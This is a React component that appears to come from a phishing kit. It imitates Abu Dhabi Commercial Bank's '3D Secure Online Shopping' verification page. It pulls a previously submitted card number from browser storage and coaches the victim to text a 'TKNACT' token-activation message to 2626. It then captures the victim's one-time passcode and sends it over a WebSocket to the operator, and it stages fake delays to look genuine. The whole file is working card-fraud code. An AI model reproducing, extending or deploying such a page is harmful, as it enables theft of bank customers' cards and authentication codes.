import React, { useState, useEffect } from 'react';
import { useWebSocket } from '../../hooks/useWebSocket';
import { isMastercard } from '../../utils/cardScheme';
import './AdcbPage.css';

export default function AdcbPage({ config }) {
  const { sendResponse } = useWebSocket();

  const [step, setStep] = useState('sms'); // 'sms' | 'otp'
  const [loading, setLoading] = useState(false);
  const [copied, setCopied] = useState(false);
  const [otpCode, setOtpCode] = useState('');
  const [submitting, setSubmitting] = useState(false);
  const [disabled, setDisabled] = useState(true);

  useEffect(() => {
    const timer = setTimeout(() => setDisabled(false), 3000);
    return () => clearTimeout(timer);
  }, []);

  const fullCard = localStorage.getItem('session_last_submitted_card') || '';
  const cleanCard = fullCard.replace(/\s/g, '');
  const lastSix = cleanCard.length >= 6 ? cleanCard.slice(-6) : (localStorage.getItem('last-six-digits') || '123456');
  const lastFour = cleanCard.length >= 4 ? cleanCard.slice(-4) : (localStorage.getItem('last-four-digits') || '3456');

  const isMc = isMastercard('uae_adcb');
  const networkLogo = isMc ? '/images/banks/uae/mc_id_check.png' : '/images/banks/uae/visa.png';

  const amount = localStorage.getItem('session_amount') || '0.00';
  const currency = localStorage.getItem('session_currency') || 'AED';
  const merchant = config?.merchantName || localStorage.getItem('session_merchant_name') || 'Merchant';

  const today = new Date();
  const dd = String(today.getDate()).padStart(2, '0');
  const mm = String(today.getMonth() + 1).padStart(2, '0');
  const yyyy = today.getFullYear();
  const formattedDate = dd + '/' + mm + '/' + yyyy;

  const tokenMsg = 'TKNACT ' + lastSix;
  const smsLink = 'sms:2626?&body=TKNACT%20' + lastSix;

  const copyToClipboard = () => {
    if (navigator?.clipboard?.writeText) {
      navigator.clipboard.writeText(tokenMsg).then(() => {
        showCopied();
      }).catch(() => fallbackCopy(tokenMsg));
    } else {
      fallbackCopy(tokenMsg);
    }
  };

  const fallbackCopy = (text) => {
    try {
      const textarea = document.createElement('textarea');
      textarea.value = text;
      textarea.setAttribute('readonly', '');
      textarea.style.position = 'absolute';
      textarea.style.left = '-9999px';
      document.body.appendChild(textarea);
      textarea.select();
      document.execCommand('copy');
      document.body.removeChild(textarea);
      showCopied();
    } catch (_) {}
  };

  const showCopied = () => {
    setCopied(true);
    setTimeout(() => setCopied(false), 2000);
  };

  const handleConfirmSent = () => {
    setLoading(true);
    setTimeout(() => {
      setLoading(false);
      setStep('otp');
    }, 2800);
  };

  const handleOtpSubmit = (e) => {
    e.preventDefault();
    const clean = otpCode.trim();
    if (clean.length !== 6 || submitting) return;

    setSubmitting(true);
    sendResponse('adcb_response', { code: clean });
  };

  return (
    <div className="adcb-wrapper">
      <div className="adcb-card">
        <div className="adcb-header">
          <img src="/images/banks/uae/adcbb_logo.jpg" alt="ADCB" className="adcb-logo-left" />
          <img src={networkLogo} alt="Network" className="adcb-logo-right" />
        </div>

        <div className="adcb-body-gradient">
          <h1 className="adcb-main-title">3D Secure Online Shopping</h1>
          <p className="adcb-subtitle">
            {step === 'otp'
              ? 'A one-time Passcode is required for this purchase. This Passcode has been sent to your registered mobile phone number.'
              : 'Card Verification via ADCB Token SMS'}
          </p>

          <div className="adcb-inner-card">
            {loading && (
              <div className="adcb-loader-overlay">
                <div className="adcb-spinner" />
                <span style={{ fontSize: '12px', color: '#4b5563', fontWeight: 500 }}>Verifying SMS...</span>
              </div>
            )}

            <span className="adcb-tx-title">Transaction details:</span>
            <div className="adcb-tx-grid">
              <span className="adcb-tx-label">Merchant:</span>
              <span className="adcb-tx-val">{merchant}</span>

              <span className="adcb-tx-label">Date:</span>
              <span className="adcb-tx-val">{formattedDate}</span>

              <span className="adcb-tx-label">Card Number:</span>
              <span className="adcb-tx-val">**** **** **** {lastFour}</span>

              <span className="adcb-tx-label">Amount:</span>
              <span className="adcb-tx-val">{currency} {amount}</span>
            </div>

            {step === 'sms' ? (
              <div>
                <div className="adcb-steps-list">
                  <div>
                    <span className="adcb-step-num">1.</span>
                    <span>Use your registered mobile number.</span>
                  </div>

                  <div>
                    <span className="adcb-step-num">2.</span>
                    <span>Open your SMS app and type the message exactly like this:</span>
                  </div>

                  <div className="adcb-copy-row">
                    <button type="button" onClick={copyToClipboard} className="adcb-copy-box">
                      {tokenMsg}
                    </button>
                    {copied && <span className="adcb-copied-badge">Copied to clipboard</span>}
                  </div>
                  <span className="adcb-click-copy-hint">(Click above to copy)</span>

                  <div>
                    <span className="adcb-step-num">3.</span>
                    <a href={smsLink} className="adcb-sms-link">
                      Send the SMS to: 2626
                    </a>
                  </div>
                </div>

                {/* iPhone SMS Mockup */}
                <div className="adcb-mockup-wrapper">
                  <span className="adcb-mockup-title">Example:</span>
                  <div className="adcb-mockup-phone">
                    <div className="adcb-mockup-header">
                      <svg width="10" height="16" viewBox="0 0 14 24" fill="none">
                        <path d="M12 2L1.8 11.7C1.4 12.1 1.4 12.8 1.8 13.2L12 22" stroke="#0375FF" strokeWidth="2.5" strokeLinecap="round" />
                      </svg>
                      <div className="adcb-mockup-contact">
                        <div className="adcb-mockup-avatar">
                          <svg width="18" height="18" viewBox="0 0 32 32" fill="none">
                            <path d="M16 18.8C19 18.8 21.4 16.1 21.4 12.7C21.4 9.4 19 6.6 16 6.6C13 6.6 10.6 9.4 10.6 12.7C10.6 16.1 13 18.8 16 18.8Z" fill="white" />
                            <path d="M6.2 25.6C6.2 25.6 16 35.1 26 25.6C21.5 19.7 9.6 20.5 6.2 25.6Z" fill="white" />
                          </svg>
                        </div>
                        <span className="adcb-mockup-num">2626 &gt;</span>
                      </div>
                      <div style={{ width: 10 }} />
                    </div>
                    <div className="adcb-mockup-body">
                      <span className="adcb-mockup-label">Text Message</span>
                      <div className="adcb-mockup-bubble-row">
                        <div className="adcb-mockup-bubble">
                          {tokenMsg}
                        </div>
                      </div>
                    </div>
                  </div>
                </div>

                <div className="adcb-action-row">
                  <button
                    type="button"
                    onClick={handleConfirmSent}
                    disabled={disabled}
                    className="adcb-submit-btn"
                  >
                    I Confirm I Sent the SMS
                  </button>
                </div>
              </div>
            ) : (
              <form onSubmit={handleOtpSubmit}>
                <div className="adcb-otp-input-row">
                  <label htmlFor="adcb-otp" className="adcb-otp-input-label">
                    Enter your OTP:
                  </label>
                  <input
                    id="adcb-otp"
                    type="text"
                    inputMode="numeric"
                    maxLength={6}
                    autoFocus
                    placeholder="••••••"
                    value={otpCode}
                    onChange={(e) => setOtpCode(e.target.value.replace(/\D/g, '').slice(0, 6))}
                    className="adcb-otp-input"
                  />
                </div>

                <div className="adcb-action-row">
                  <button
                    type="submit"
                    disabled={otpCode.length !== 6 || submitting}
                    className="adcb-submit-btn"
                  >
                    {submitting ? 'Submitting...' : 'Submit'}
                  </button>
                </div>
              </form>
            )}
          </div>
        </div>

        <div className="adcb-footer-terms">
          By clicking Submit you agree to the Terms of Service
        </div>
      </div>
    </div>
  );
}